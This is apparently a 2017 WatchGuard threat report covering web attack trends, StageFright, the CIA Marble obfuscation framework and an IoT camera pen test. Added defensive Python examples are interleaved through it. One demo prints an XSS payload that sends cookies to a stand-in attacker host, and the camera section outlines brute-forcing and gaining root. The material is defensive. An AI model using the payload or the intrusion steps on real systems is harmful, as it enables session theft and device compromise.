WEB-CLIENT Suspicious HTML Iframe Tag(4) | Web Client | All web browsers | n/a | 36,874
Android libstagefright mp4 tx3g Atom Multiple Buffer Overflow -1 | Android buffer overflow | Android OS | CVE-2015-3824 | 31,085

Internet Security Report: Q1 2017 • 15 Network Attack Trends

Quarter-Over-Quarter Attack Analysis

In Q1, six of the network attacks from the previous quarter return to our top list. At a high level, not much has changed with these six attacks. Almost all of them moved up on the list, and they generally retain the same order. The only exception is the "Suspicious HTML iframe tag" issue, which dropped two spots to ninth. While web-based attacks still dominate the top threats, the scale has tipped from web client attacks to web server attacks, which we will talk about next.

The Web Battleground Shifts to Servers

Last quarter, web attacks dominated our top ten, filling all the spots on our list. This quarter, web threats still dominate, but a mobile exploit cracked the top 10 for the first time. This quarter also saw a shift in the type of web attacks. In Q4 2016, 73% of the top web attacks targeted web clients (the browser and its supporting software), not web servers. Now, only three of the nine web threats on the list target web clients. In the end, 82% of the top network attacks (by hit count) target web servers or web-based services.

This marks a significant shift in the mix of web server vs. client threats, and that trend extends into the top 20 as well. While a few more client vulnerabilities show up in the wider top 20 list, it also includes more web server flaws. We don't think drive-by download style attacks will go away, but it appears attackers have focused their efforts and tools on exploiting web servers. A couple of new web server attacks also made the list, which we'll cover next. With the increase in web server attacks, we recommend you harden your web servers, use a firewall to limit access to any internal web services, and keep your server software up to date with the latest patches.

Web Application Attacks Move Up

Though many of the web vulnerabilities in the top threat list remain the same, Q1 saw two newcomers: a web application vulnerability and a login brute force attack.

1. WEB Cross-site Scripting – 36: A web application (app) vulnerability is a flaw in the actual web app, and not in the server software. This could include the code making up a common web framework you use, or the custom code you created specifically for your own web apps. Common examples of web app flaws include cross-site scripting (XSS), local and remote file inclusion, SQL injection (SQLi), cross-site request forgery (CSRF), and many more.

Last quarter, not a single web app vulnerability made the top 10. This quarter, an XSS vulnerability rose to number five. An XSS attack gets attacker-controlled script into a page the vulnerable app serves, so the script runs in the victim's browser with that user's session. For the reflected variety that signatures like this one catch, attackers typically need to trick you into clicking a specially crafted link for the attack to work. If you do fall for the link, the attacker can gain access to that web app's cookies, and any of your other content on that site.

WEB Cross-site Scripting – 36 is one of many broad signatures to detect generic cross-site scripting attempts against your users. It's interesting to see web app attacks reach the top 10. We found three additional web app attacks in the top 20 as well. Protecting against XSS attacks is a twofold process, since the vulnerability lies in a server web app, but the attack targets a web client. For web app administrators, you should visit OWASP.org to learn how to develop secure web apps (a broad topic we can't cover in a short report). For web users, you should be very careful clicking unusual links.

2. WEB Brute Force Login – 1: While it doesn't technically catch a web app vulnerability, the Brute Force Login IPS rule does catch an attack that targets the login pages of web applications. If you don't build login throttling into your web application, attackers can use tools like THC Hydra or the Burp Suite to try and brute force user accounts on your website. This IPS rule can catch web login brute force attempts by looking for repeated connections from the same source address.

With the increase in web app vulnerabilities in Q1, we recommend web administrators audit their source code. As mentioned earlier, OWASP.org is a great resource for learning about protecting your web applications.
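The two newcomers above have a common defensive answer inside the application itself. The following is an added example (not code from the report or from WatchGuard) of a login endpoint that escapes the username it reflects, which closes the reflected XSS hole, and throttles repeated failures per source address, which is the same signal the Brute Force Login rule looks for. The user store, thresholds and addresses are assumptions for illustration.

```python
"""A login endpoint showing the defensive side of the two Q1 newcomers.

Added example, not code from the report: (1) the error page HTML-escapes the
username it reflects, so a crafted link cannot smuggle script into the page
(reflected XSS), and (2) failed logins are throttled per source address, so a
guessing tool like THC Hydra hits a lockout instead of an unlimited oracle.
Thresholds, the user store and sample addresses are assumptions.
"""
import hmac
import html
import time
from collections import defaultdict, deque

# Constructed user store. Real code stores a salted password hash, never this.
USERS = {"alice": "correct horse battery staple"}


def render_error_vulnerable(username):
    """Reflects the submitted value verbatim: the reflected XSS bug."""
    return f"<p>Login failed for user {username}</p>"


def render_error_safe(username):
    """Escapes & < > and both quote characters so the browser renders text, not markup."""
    return f"<p>Login failed for user {html.escape(username, quote=True)}</p>"


class LoginThrottle:
    """Per-source sliding-window failure counter with a temporary lockout.
    The IPS rule watches for repeated connections from one source; this does
    the same inside the application, where it can refuse the attempt."""

    def __init__(self, max_failures=5, window_s=300, lockout_s=900, clock=time.monotonic):
        self.max_failures = max_failures
        self.window_s = window_s
        self.lockout_s = lockout_s
        self.clock = clock
        self._failures = defaultdict(deque)   # ip -> timestamps of recent failures
        self._locked_until = {}               # ip -> time the lockout expires

    def is_locked(self, ip):
        until = self._locked_until.get(ip)
        if until is None:
            return False
        if self.clock() >= until:             # lockout expired: forget the history
            del self._locked_until[ip]
            self._failures.pop(ip, None)
            return False
        return True

    def record_failure(self, ip):
        now = self.clock()
        recent = self._failures[ip]
        recent.append(now)
        while recent and now - recent[0] > self.window_s:
            recent.popleft()
        if len(recent) >= self.max_failures:
            self._locked_until[ip] = now + self.lockout_s

    def record_success(self, ip):
        self._failures.pop(ip, None)


def login(throttle, ip, username, password):
    """Return (HTTP status, body): 200 on success, 401 on a wrong password,
    429 once the source is locked out (checked before the password)."""
    if throttle.is_locked(ip):
        return 429, "<p>Too many failed attempts. Try again later.</p>"
    expected = USERS.get(username, "")
    ok = bool(expected) and hmac.compare_digest(expected.encode(), password.encode())
    if ok:
        throttle.record_success(ip)
        return 200, "<p>Welcome</p>"
    throttle.record_failure(ip)                # unknown users count too: no enumeration
    return 401, render_error_safe(username)


if __name__ == "__main__":
    payload = '<script>new Image().src="http://attacker.invalid/?c="+document.cookie</script>'
    print(render_error_vulnerable(payload))   # script tag survives intact
    print(render_error_safe(payload))         # &lt;script&gt;... renders as text
    throttle = LoginThrottle()
    for guess in ["123456", "password", "qwerty", "letmein", "admin"]:
        print(login(throttle, "203.0.113.7", "alice", guess))
    print(login(throttle, "203.0.113.7", "alice", USERS["alice"]))  # 429 even with the right password
```

The lockout is keyed on source address only, which is what an IPS can see; an application can additionally key on the target account so that a distributed guessing campaign is slowed as well.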


StageFright Returns to the Spotlight

As previously mentioned, this quarter included the first mobile-specific exploit to crack the top threats list. StageFright targets Android mobile devices and first earned notoriety in 2015 when researchers publicly disclosed it ahead of the Black Hat security conference. Specifically, StageFright is a set of memory-corruption (buffer overflow) vulnerabilities in Android's libstagefright media library, which parses the video files that arrive in MMS messages. By sending a carefully crafted video message, an attacker can exploit such an overflow to execute arbitrary code on the device in the context of the privileged media service, or at least cause the device to crash. You can learn more about it in this Daily Byte video.

Over the course of 2015, various Android platforms patched StageFright. However, not all users or vendors keep their Android installs up to date, so many mobile devices may remain vulnerable. Our StageFright signature catches some of the malicious MP4 files used to trigger this video-handling vulnerability. It's interesting to see this mobile threat make our top attack list. Nearly two years later, not only is StageFright still present, but it's prolific.

If you are worried about this mobile threat, we highly recommend upgrading your Android operating system (if it's not patched already). Barring that, some third-party texting applications can mitigate the risk of StageFright by preventing mobile devices from processing video messages automatically. These applications will ask whether you want to download and play video messages. You should train your users to treat all unsolicited video messages as suspicious, and avoid clicking links or downloading files they don't expect.

In summary, the web is still the battleground, but the conflict has shifted from client vulnerabilities to server ones. If you are a web administrator, use this as an excuse to circle back and reevaluate your security for web servers and applications.
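The signature above matches specific malicious MP4 files. As an added example (ours, not WatchGuard's signature and not Android's code), the parser below walks the MP4 box tree that carries the tx3g atom and refuses to follow any box whose declared size does not fit inside its container, which is the bounds check a media parser needs before it trusts a size field from the file. The sample files, including the crafted tx3g entry, are constructed inline; the finding labels are ours.

```python
"""Bounds-checked walk of an MP4 (ISO BMFF) box tree that refuses to follow a
'tx3g' (or any other) atom whose declared size does not fit its container.

Added example, not the report's code and not the WatchGuard IPS signature:
the signature matches specific malicious files, while this generic triage
parser shows why every box size in an MP4 has to be treated as attacker input.
The 'ftyp/moov/.../stsd/tx3g' sample files are constructed inline; the
finding labels are ours.
"""
import struct

# Boxes whose payload is a list of child boxes.
CONTAINERS = {b"moov", b"trak", b"mdia", b"minf", b"stbl"}
# 'stsd' is a FullBox: 1 byte version + 3 bytes flags, then a 4-byte entry
# count, then the sample entries ('tx3g' for timed text) as child boxes.
STSD_HEADER = 8


def walk(data, start=0, end=None, depth=0, boxes=None, findings=None):
    """Return (boxes, findings). boxes = [(depth, type, offset, size), ...];
    findings = anomalies that a naive parser would have followed blindly."""
    end = len(data) if end is None else end
    boxes = [] if boxes is None else boxes
    findings = [] if findings is None else findings
    off = start
    while off < end:
        remaining = end - off
        if remaining < 8:
            findings.append(("truncated-header", off))
            break
        size, btype = struct.unpack(">I4s", data[off:off + 8])
        header = 8
        if size == 1:                       # 64-bit 'largesize' follows the type
            if remaining < 16:
                findings.append(("truncated-largesize", off))
                break
            size = struct.unpack(">Q", data[off + 8:off + 16])[0]
            header = 16
        elif size == 0:                     # box extends to the end of its parent
            size = remaining
        if size < header or size > remaining:
            # This is the check that matters: a size the parser trusts is what
            # turns a crafted atom into a memory-safety bug.
            findings.append(("bad-size", off, btype.decode("latin-1"), size, remaining))
            break
        boxes.append((depth, btype, off, size))
        body = off + header
        if btype in CONTAINERS:
            walk(data, body, off + size, depth + 1, boxes, findings)
        elif btype == b"stsd":
            walk(data, body + STSD_HEADER, off + size, depth + 1, boxes, findings)
        off += size
    return boxes, findings


def scan(data):
    """Summarise a file: how many tx3g entries parsed cleanly, and any anomalies."""
    boxes, findings = walk(data)
    return {
        "tx3g_count": sum(1 for b in boxes if b[1] == b"tx3g"),
        "findings": findings,
        "suspicious": bool(findings),
    }


# --- constructed sample files ------------------------------------------------
def box(btype, payload=b""):
    return struct.pack(">I", 8 + len(payload)) + btype + payload


def stsd(*entries):
    return box(b"stsd", b"\x00\x00\x00\x00" + struct.pack(">I", len(entries)) + b"".join(entries))


def sample_file(tx3g_entry):
    ftyp = box(b"ftyp", b"isom\x00\x00\x02\x00isommp41")
    stbl = box(b"stbl", stsd(tx3g_entry))
    return ftyp + box(b"moov", box(b"trak", box(b"mdia", box(b"minf", stbl))))


# A plausible timed-text sample entry (6 reserved bytes, data_reference_index, body).
BENIGN_TX3G = box(b"tx3g", b"\x00" * 6 + b"\x00\x01" + b"\x00" * 30)
# Same 46 bytes on disk, but the size field claims almost 4 GB.
EVIL_TX3G = struct.pack(">I", 0xFFFFFFF0) + b"tx3g" + b"\x00" * 38

if __name__ == "__main__":
    for label, entry in (("benign", BENIGN_TX3G), ("crafted", EVIL_TX3G)):
        print(label, scan(sample_file(entry)))
```

On the crafted file the walk stops at the tx3g entry and reports the declared size against the 46 bytes actually available, instead of reading past the end of the buffer. A detection signature works from known bad files; a parser that applies this check refuses the whole class.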



Geographic Attack Distribution

The general regional attack trends we saw in Q4 2016 continued this quarter, with the majority of the top network attacks happening in EMEA. We did see marginally fewer attacks in APAC and more in the Americas, but overall, the regional trends look very much like the normalized picture from our last report.

Besides the overall regional trend, our feed data also shows interesting country-specific nuances between the individual top attacks.

• 96% of suspicious iframes were detected in North America. The Suspicious HTML iframe threat overwhelmingly affected North America, with 96% of the hits falling in the U.S. and Canada. Iframes are legitimate HTML tags designed to embed one page inside another. However, web attacks often leverage malicious iframes to redirect victims to a malicious site. If an attacker can hijack a legitimate website, they often inject a hidden iframe to force that site's visitors to another site hosting their web exploit kit (EK). We suspect these hits have to do with increased web attack campaigns in the U.S. and Canada.

• The top cross-site scripting (XSS) attack targeted Italy 90% of the time. We haven't attributed it to a specific campaign, but most XSS attacks in our top threat list affect victims in Italy.

• NGINX is a popular, open-source web server and reverse proxy (for HTTP and mail protocols). The NGINX vulnerability in our top 10 is an old, but serious, flaw from four years ago (CVE-2013-2028). While not as dominating as the examples above, 53% of the "NGINX HTTP_parse_chunked buffer overflow" detections come from Germany. The remaining hits are spread between 17 other countries.

• Likewise, 46% of "JavaScript Obfuscation in EKs" hits were found in the U.S. While that may not seem like an overwhelming majority, the remaining hits were spread sparingly across 45 other countries.

• Finally, 73.6% of the tnftp attacks are split between Great Britain (42.6%) and Australia (31%). By the way, tnftp is a popular FTP client for BSD platforms. Though it is an FTP client, this vulnerability involves how it fetches HTTP URLs. We are not sure why attackers are primarily targeting Great Britain and Australia with these tnftp attacks. Other than sharing a mutual historical ancestry, these countries have little in common.
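The Suspicious HTML iframe hits above are the client-side trace of a compromised site. As an added example (ours, not WatchGuard's signature), the scan below shows the kind of check a site owner can run over their own pages: it flags only iframes that are hidden from the visitor, which is the property an exploit-kit redirector needs and an ordinary embed does not, and records an off-site destination as an extra reason. The sample page and host names are constructed.

```python
"""Heuristic scan for exploit-kit redirector iframes in a page you host.

Added example, ours rather than the WatchGuard 'Suspicious HTML Iframe Tag'
signature: iframes are legitimate, so only frames that are invisible (zero or
near-zero size, display:none, visibility:hidden, pushed far off-screen) are
flagged, and an off-site src is recorded as an extra reason. The sample page
and host names are constructed.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|(?:left|top)\s*:\s*-\d{3,}", re.I)


def _px(value):
    """'0', '1px', ' 2 ' -> int; None when the attribute is absent or non-numeric."""
    m = re.match(r"\s*(\d+)", value or "")
    return int(m.group(1)) if m else None


class IframeCollector(HTMLParser):
    """Collects the attribute dict of every <iframe> start tag."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":                    # html.parser lowercases tag/attr names
            self.iframes.append({k: (v or "") for k, v in attrs})


def suspicious_iframes(page_html, page_host):
    """Return [{'src': ..., 'reasons': [...]}, ...] for frames that are hidden."""
    parser = IframeCollector()
    parser.feed(page_html)
    hits = []
    for attrs in parser.iframes:
        reasons = []
        width, height = _px(attrs.get("width")), _px(attrs.get("height"))
        if (width is not None and width <= 2) or (height is not None and height <= 2):
            reasons.append("tiny")
        if HIDDEN_STYLE.search(attrs.get("style", "")):
            reasons.append("hidden-style")
        if not reasons:
            continue                            # visible frames are normal (videos, maps)
        src = attrs.get("src", "")
        host = urlparse(src).hostname           # None for relative URLs
        if host and host.lower() != page_host.lower():
            reasons.append("external:" + host.lower())
        hits.append({"src": src, "reasons": reasons})
    return hits


# Constructed page: a legitimate video embed plus two injected redirectors.
SAMPLE_HTML = """
<html><body>
<h1>Local News</h1>
<iframe src="https://www.youtube.com/embed/abc123" width="560" height="315"></iframe>
<iframe src="http://ek.example.net/gate.php" width="1" height="1" style="visibility:hidden"></iframe>
<p>Story text...</p>
<IFRAME SRC="//ek2.example.org/x.html" STYLE="position:absolute;left:-9999px"></IFRAME>
</body></html>
"""

if __name__ == "__main__":
    for hit in suspicious_iframes(SAMPLE_HTML, "news.example.com"):
        print(hit)
```

Real injections are often written by a script at load time rather than present in the static HTML, so run a check like this against the rendered DOM (or compare served pages against the deployed source) as well as against files on disk.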

Figure 8: Network attack detection by region (EMEA 63.3%, Americas 32%, APAC 4.7%)


Though some attacks are global, others target various countries differently. You can learn a lot from this regional nuance. For instance, our data shows that if you live in North America, you should look out for web-based attacks and drive-by download campaigns that leverage malicious exploit kits. Meanwhile, if you're in Italy, beware of XSS attacks, and train your users to avoid clicking suspicious links. Finally, if you live in the UK or Australia, be sure you have updated tnftp.

Our feed data also shows how the quarter's top malware was delivered:

• Malicious JavaScript primarily arrives in email. Like the previous quarter, we saw a significant amount of malicious JavaScript in Q1. JavaScript was designed for the web, so you might expect to encounter it more there. However, we saw more malicious JavaScript in email. Though attackers do exploit malicious JavaScript with their web-based EKs, 97.2% of the malicious JavaScript we saw arrived in email. These evil emails tend to include compressed Zip attachments, which hide malicious .JS files. As mentioned in the last report, this is a common delivery vector for ransomware like Locky.

• Linux malware is sent over the web. In our Malware Trends section, we mentioned that we saw a lot of Linux-based threats in Q1. These Linux threats were overwhelmingly delivered over the web (99.99%), with only eight of the 419,367 instances arriving via email or FTP. This makes sense if you think about how automated Linux and IoT bots work. As seen in the screenshot sample in that section, many malicious Linux scripts simply use the "wget" command to grab other malicious tools over an everyday web connection.

• A Brazilian banking attack sends malicious Java over email. Like JavaScript, Java is one of the things you might expect to see more over the web. However, 99.9% of the Java/Downloader malware arrived over email. As mentioned before, this attack occurred almost exclusively in Brazil, which suggests this malware is associated with a well-known attack campaign targeting Brazilian banks. The attackers behind that campaign send phishing emails that contain malicious .Jar files, sometimes directly attached to the email, but also often compressed within a Zip file. The attackers use a malicious Java downloader because it allows them to target both PCs and Macs.

• The Bitcoin mining trojan was entirely delivered via FTP. As mentioned earlier, Generic36.AAVT is associated with Bitcoin mining trojans. This threat was the only malware to buck the trend, and not get delivered over email or the web. It was almost exclusively FTP-based, with one exception out of 77,704 instances. We're not entirely sure why this is; however, many traditional bots did use FTP to download additional payloads. We theorize that this could be another threat adding a bitcoin miner to a victim's computer as a secondary payload.
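Two of the bullets above describe the same delivery trick: a script or .jar hidden inside a Zip attachment, sometimes inside another Zip. The following is an added example (not code from the report) of a mail-gateway style triage that opens attachments in memory, recurses into nested archives to a fixed depth, and reports members with script or executable extensions. The extension list, depth and size limits are our choices, and the sample archives are constructed inline.

```python
"""Attachment triage for the delivery trend above: .js and .jar payloads hidden
in (sometimes nested) Zip attachments.

Added example, not code from the report. Given an attachment's bytes, it walks
Zip containers in memory, recursing into nested archives up to a fixed depth,
and reports members with script or executable extensions. The extension list,
depth and size limits are our choices; the sample archives are constructed.
"""
import io
import zipfile

RISKY_EXT = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".jar", ".exe", ".scr", ".hta", ".ps1"}
MAX_DEPTH = 3                          # zip-in-zip-in-zip is deep enough for any legitimate mail
MAX_MEMBER_BYTES = 20 * 1024 * 1024    # do not inflate oversized members (zip bombs)


def _ext(name):
    name = name.lower()
    dot = name.rfind(".")
    return name[dot:] if dot >= 0 else ""


def triage_attachment(name, data, depth=0):
    """Return a list of (path, reason) findings; an empty list means nothing
    matched. Paths use '!' to separate archive nesting levels."""
    findings = []
    ext = _ext(name)
    if ext in RISKY_EXT:
        findings.append((name, "risky-extension " + ext))
    if not zipfile.is_zipfile(io.BytesIO(data)):
        return findings                       # plain file: extension check only
    if depth >= MAX_DEPTH:
        findings.append((name, "nested-too-deep"))
        return findings
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            path = f"{name}!{info.filename}"
            if info.file_size > MAX_MEMBER_BYTES:
                findings.append((path, "oversized-member"))
            elif info.flag_bits & 0x1:
                findings.append((path, "encrypted-member"))   # password-protected: cannot inspect
            else:
                findings.extend(triage_attachment(path, zf.read(info), depth + 1))
    return findings


# --- constructed samples -----------------------------------------------------
def _zip(members):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for member_name, content in members.items():
            zf.writestr(member_name, content)
    return buf.getvalue()


INVOICE_ZIP = _zip({"invoice_2017_03.js": b"var sh = new ActiveXObject('WScript.Shell'); /* downloader stub */"})
FAKE_JAR = _zip({"META-INF/MANIFEST.MF": b"Manifest-Version: 1.0\n", "Downloader.class": b"\xca\xfe\xba\xbe"})
BOLETO_ZIP = _zip({"boleto.jar": FAKE_JAR})
CLEAN_ZIP = _zip({"report.pdf": b"%PDF-1.4 constructed placeholder"})
DEEP_ZIP = _zip({"a.zip": _zip({"b.zip": _zip({"c.zip": _zip({"x.js": b"1"})})})})

if __name__ == "__main__":
    for label, blob in (("invoice.zip", INVOICE_ZIP), ("boleto.zip", BOLETO_ZIP),
                        ("report.zip", CLEAN_ZIP), ("deep.zip", DEEP_ZIP)):
        print(label, triage_attachment(label, blob))
```

A .jar is itself a Zip, so the walker descends into it after flagging the extension; a password-protected member is reported rather than skipped silently, since campaigns that put the password in the mail body rely on scanners giving up at that point.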



Firebox Feed Statistics Defense Learnings

We've shared several small defensive tips throughout this section, but here are three defense strategies for some of the top-level trends identified by Q1's Firebox Feed data:

1. Harden your Linux servers and IoT devices.

Three, if not four (if you include PERL/ShellBot), of the top ten Q1 malware variants target Linux systems. We suspect this increase comes from attackers launching automated attacks against weak IoT devices. Manufacturers focusing on usability and affordability over security have released a huge number of incredibly insecure IoT devices to the masses. Consumers with little security knowledge often connect these devices to the Internet without any protection, allowing attackers easy access. Open Telnet and SSH combined with weak passwords allow attackers to quickly infect swaths of hosts. At the very least, we recommend you firewall your IoT devices and Linux servers from the Internet. Avoid opening access to command line interfaces without additional authentication or security mechanisms like VPN. Change your default passwords and update your software or firmware as often as possible.

2. The web battleground has shifted towards servers.

In Q4, we saw many browser-based attacks. However, this quarter we saw more web server attacks. Spend some time hardening your web servers, and don't forget any other services with web-based interfaces. Hardening servers involves locking down permissions, limiting resource exposure, and making sure the server's software is fully patched. You should also audit your web applications for programmatic vulnerabilities. Web application security is a complex topic, but we recommend you visit OWASP.org for a wealth of practical tips.

3. Traditional AV misses 38% of malware.

For the second quarter in a row, we have seen our legacy AV solution miss a lot of malware that our more advanced solution can catch. In fact, the miss rate has gone up from 30% to 38%. Nowadays, cyber criminals use many subtle tricks to repack their malware so that it evades signature-based detection. If you want to block most malware, you need to deploy an advanced malware solution. These anti-malware solutions can often detect never-before-seen zero day malware using more proactive detection techniques, such as behavior analysis and machine learning. If you're a WatchGuard customer, APT Blocker catches the malware that traditional AV misses. If you don't have an advanced malware solution, you'll likely miss more than one third of threats online.


Top Security Incidents

Every quarter, several major security stories make the headlines. Some of these stories involve well-known products or services, or simply have a major effect on the security of the overall industry. The media does a great job informing the public of these issues, but they don't always dig into, or research, the technical details. Our goal with this section of the report is to introduce new research and technical detail that you didn't already hear from the news, or other research sources. This quarter, we cover the Marble framework from the CIA Vault 7 leaks.

The CIA Vault 7 Leaks

On March 7, 2017, WikiLeaks began releasing a series of leaks from the U.S. Central Intelligence Agency (CIA) code-named "Vault 7." The initial leak included descriptions and details of the CIA's covert hacking program, including stockpiles of zero day exploits. The exploits targeted unpatched vulnerabilities in Android and iPhone devices, Smart TVs, and traditional desktop and server operating systems like Windows, OS X, and Linux.

While the leaks contained many details for ongoing CIA projects, WikiLeaks consciously held back actual source code and proof of concept (POC) exploits from the public, instead offering to share them with affected manufacturers for analysis.

Two weeks after the first Vault 7 leak, WikiLeaks published a second release titled Dark Matter. The Dark Matter release disclosed several rootkit tools the CIA used to gain persistence on Apple computers by infecting the firmware. The leak included the user manual for a modified Thunderbolt-to-Ethernet adapter, code-named the “Sonic Screwdriver,” capable of bypassing EFI/UEFI protections on the target host to facilitate installation of the rootkit. Dark Matter also disclosed similar tools for infecting Apple’s iOS mobile operating system, dating back to 2008.

For sophisticated hackers, covering your tracks is one of the most important parts of an attack. Stealing sensitive information does you no good if investigators can clearly trace the attack back to you. The act of investigating an attack and analyzing its artifacts is called computer forensics. On March 31, WikiLeaks continued their "Vault 7" leaks with the release of the CIA's anti-forensics tool, called the Marble framework. The leak included Marble's source code and user documentation.

A Technical Analysis of the Marble Framework

When malware authors write source code, they often include strings of text along with the regular computational instructions. Such strings can include file paths, Windows registry key names, and sometimes even hard-coded words or passwords. When they compile their source, these strings remain present in the executable, for anyone to find.

When analyzing malware, forensic investigators usually first check executables for any human-readable strings, which may provide clues about the malware and its origins. The CIA primarily designed the Marble framework to obfuscate these strings of text, in hopes of preventing investigators from linking CIA malware to a specific developer (i.e. the CIA).


The framework includes several modules with different purposes. The Mibster module looks for strings marked for obfuscation and performs the actual scrambling. The Validator module checks the compiled executable file and confirms that all the marked strings were successfully scrambled. Finally, the Mender module reverts the source code back to its original state in the event of an error, or if manually requested by the malware author.

To understand the Marble framework, you must first understand how programming languages like C and C++ store strings of text. If you were developing a new ransomware variant, you probably would want to include a function that creates a text file with a ransom note on the victim’s desktop. You might include the string of text, “YOUR FILES ARE ENCRYPTED”, inside this text file. In order for your ransomware to create that note, it would have to include that string of text in its source code.

C and C++ store string literals as arrays of individual characters, terminated by a null byte (C++ also has a dedicated string class, std::string, which we'll ignore here).

Figure 9: String as character array storage example

Each character in the character array takes up 8 bits, or 1 byte, of memory, which is large enough to store any letter in the English alphabet. Other writing systems, such as Cyrillic, do not fit in a single byte per character. The wchar_t (wide character) data type lets C and C++ use a wider storage unit per character: on Windows it is 16 bits, or 2 bytes, which is the size assumed here (most Linux toolchains make it 32 bits). To store the Russian string "шифровать" (roughly "encrypt" in English), we would use an array of wide characters.

Figure 10: String as wide-character array storage example

The Marble framework defines two new data types for string storage. The “CARBLE” data type is 1-byte long and matches up to the original “char” data type, while the “WARBLE” data type is 2-bytes long and matches up to the original “wchar_t” data type. Strings that are defined using the new CARBLE and WARBLE data types are obfuscated by the framework when the source code is compiled into an executable.

Figure 11: Marble framework new string storage data types

When using the Marble framework, a malware author first chooses which of the different obfuscation algo- rithms – or “Marbles” as the CIA calls them – they wish to use. The framework contains 106 different algorithms by default, 48 using C++ and 58 using C. The documentation also includes instructions for adding additional algorithms.

After selecting the pool of obfuscation algorithms, the malware author adds the framework to their project, and includes instructions for the compiler to run Mibster (the obfuscation module) during compilation. Now the malware developer can use the newly defined CARBLE and WARBLE data types to flag strings for obfuscation by Mibster.


When the malware author compiles their code, Mibster chooses an obfuscation algorithm from the pool, and then notes all the source files containing the CARBLE and WARBLE data types. It creates a "gold copy" (unmodified) of those files so it can safely revert to the originals in case of an error during obfuscation.

Next, Mibster parses these files, looking for strings using the CARBLE and WARBLE data types. When it locates one, it scrambles the string using the chosen obfuscation algorithm. It replaces the original with the newly scrambled string plus additional de-obfuscation code. The de-obfuscation code allows the compiled executable (malware) to recover the original string at run time, when it needs it.

After Mibster completes the obfuscation process, the framework validates the output to confirm all the marked strings were scrambled. If it encounters any errors, the Mender module reverts the source code back to its original (using the gold copy files).

In the end, the Marble framework scrambles every string the author marked with CARBLE or WARBLE, so a forensic investigator running a strings dump over the executable learns nothing about the author from them.

Marble Obfuscation Algorithms

As for the obfuscation algorithms themselves, each algorithm generates a random key; the key size depends on the algorithm used.

Figure 12: Obfuscation random key generation

As Mibster feeds a string through the algorithm, it modifies each character using a byte from the key. The modification either adds the key byte to the character value or subtracts it (bumping), or XORs the two together (Exclusive OR).

Figure 13: Obfuscation XOR algorithm

As mentioned before, the de-obfuscation code is the internal mechanism that allows the compiled executable to read an obfuscated string by returning it to its original state while the program is running. One other difference between the available algorithms is how they implement this de-obfuscation code. Some place the de-obfuscation code alongside the scrambled string as a computational loop; others call a separate function stored elsewhere in the executable.

Figure 14: De-obfuscation code generation


Marble Framework Defense Learnings

The leaked Marble framework is a fairly complex tool used to throw off savvy forensic investigators, not normal users. However, the average administrator can still draw out a few defensive learnings from this example.

1. Obfuscation can also help malware hide from detection

There's a big difference between executable code obfuscation and anti-forensic string obfuscation. The Marble framework provides the latter, and doesn't really help malware evade detection (beyond defeating signatures keyed on the scrambled strings themselves). It mainly makes it harder for investigators to attribute the malware. That said, this incident reminds us that criminal attackers use code obfuscation in a similar way to hide malware from antivirus (AV) software. Signature-based AV solutions looking for certain code patterns won't find them if the code is obfuscated. This highlights the necessity for more advanced malware detection solutions, such as behavior-based sandboxes, to detect obfuscated malware.

2. Beware of false flag attacks in nation-state attacks

The user documentation released in the Vault 7 leak confirms that the Marble obfuscation tools handle strings in languages other than English (the release's test examples include Chinese, Russian, Korean, Arabic and Farsi). This suggests that the CIA could leverage this tool to make their malware appear to come from another country, something experts call a false flag attack. While there is no direct evidence that the CIA used Marble in this way, you should be aware of the possibility.

3. Expect false flags to trickle down to criminal malware

More importantly, be aware that the release of the Marble framework now enables even unsophisticated criminals to obfuscate their malware in a way that could be falsely attributed to the CIA. Malware authors could even backdate the compile timestamp to make their malware appear as though it was created before the public release of the framework. We expect some criminal malware to start using string obfuscation to throw off investigators.


WatchGuard Threat Lab’s IoT Research Projects

In response to the rapid spread of the Mirai botnet, and the perceived general insecurity of new consumer IoT devices, WatchGuard’s Threat Lab launched an ongoing project to analyze various IoT devices for security flaws. Some of our test targets included Wi-Fi cameras, fitness accessories, and even a wireless egg tray. Any security flaws our researchers find are responsibly disclosed to device manufacturers for patching. Furthermore, we wait 90 days before full disclosure in the event that vendors don’t respond to our disclosure notice.

Responsible Disclosure: Ouvis C2 HD Security Camera

As a part of our ongoing IoT vulnerability research project, one of the recently tested devices included the Ouvis C2 HD Wireless Security Camera. This is a wireless camera that includes Android, iOS and browser-based remote viewing.

In this report, we finally share some zero day vulnerabilities that were discovered in early January. Since the vendor did not respond to our researcher's disclosure, we had to wait the full 90 days before sharing these details.

Open Telnet Access

When first examining new network devices for vulnerabilities, researchers typically start by port scanning the device to identify any open services.

Figure 15: nmap port scan output


A port scan of the Ouvis camera showed open Telnet on TCP/23 and an HTTP web server running on TCP/81 – a non-standard port for web servers. We immediately noted the open Telnet access as a potential security vulnerability, since Telnet offers no encryption. There is no reason for consumer IoT devices to allow Telnet-based management access, especially when more secure options like SSH exist. Malicious applications like the Mirai botnet thrive because of open Telnet access combined with weak default passphrases.

After detecting an open Telnet port, a penetration (pen) tester typically tries to obtain privileged command-line access to the device through Telnet. To gain such access, the pen tester needs to figure out the username and password for the ‘root’ account on the device. Since these CLI interfaces are often left in for diagnostic purposes, manufacturers don’t share credentials for them, and don’t necessarily intend them for the customer’s use.

Brute forcing to the rescue. In respect to authentication, a brute force attack is the act of rapidly trying different username and password combinations against a login. Using an application called THC Hydra, our researcher attempted to brute force the credentials for the device. To speed up the attack, he configured Hydra to use a wordlist containing thousands of common passphrases. After several hours of trying different username and password combinations, Hydra was unable to find working credentials.

Figure 16: hydra password brute force via

After failing to brute force credentials, the threat research team was forced to find other methods for obtaining root access. The next step involved disassembling the camera in search of console serial access. Luckily, one of the circuit boards in the camera had UART pads.

Figure 17: Empty UART pads

After soldering a USB-to-serial (TTL-level UART) adapter to the empty pads, the team could access the camera's serial console at 115200 baud.

Figure 18: Camera U-Boot output

After halting the boot process, our researcher modified the U-Boot configuration to initialize a shell after mounting the filesystem.

Figure 19: Modifying the U-Boot configuration

Our researcher was finally greeted with a command line shell for the camera. Once connected, he checked /etc/passwd for any user accounts and easily found the root account and its hashed password.

Figure 20: Hashed root password


